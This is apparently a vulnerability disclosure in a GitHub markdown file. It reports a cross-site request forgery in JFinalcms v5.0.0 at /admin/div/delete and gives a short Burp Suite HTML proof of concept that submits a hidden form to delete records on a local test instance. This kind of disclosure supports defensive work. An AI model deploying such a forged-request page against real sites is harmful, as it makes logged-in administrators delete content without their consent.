Skip to content

Latest commit

 

History

History
30 lines (20 loc) · 835 Bytes

CSRF exists at the deletion point of the custom table.md

File metadata and controls

30 lines (20 loc) · 835 Bytes

target:https://gitee.com/heyewei/JFinalcms

version:v5.0.0

JFinalcms v5.0.0 was discovered to contain a Cross-Site Request Forgery (CSRF) via the component /admin/div/delete

图片

create poc

图片

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1:8888/admin/div/delete" method="POST">
      <input type="hidden" name="ids" value="1" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

successed

图片